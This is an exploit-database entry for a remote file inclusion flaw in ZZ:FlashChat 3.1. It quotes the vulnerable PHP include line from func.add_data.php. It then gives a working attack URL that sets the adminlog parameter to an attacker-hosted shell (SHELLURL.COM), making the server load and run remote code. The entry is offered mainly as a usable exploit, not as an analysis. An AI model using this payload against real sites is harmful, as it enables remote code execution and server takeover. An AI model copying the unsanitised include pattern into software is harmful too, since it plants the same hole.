ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability

2006-08-19T00:00:00
ID 1337DAY-ID-722
Type zdt
Reporter SHiKaA
Modified 2006-08-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability
===============================================================




#==============================================================================================
#ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                                                                                                 
#                                                                             
#Version : V3.1                                                  
#                                                               
#
#================================================================================================
#
#Bug in : chat/inc/func.add_data.php
#
#Vlu Code :
#--------------------------------
#
#  if($cfg['autolink']==1){	
#		include($adminlog.'./inc/func.autolink.php'); 
#  }
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/chat/inc/func.add_data.php?cfg[autolink]=1&adminlog=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
==================================================================================================




#  0day.today [2018-02-17]  #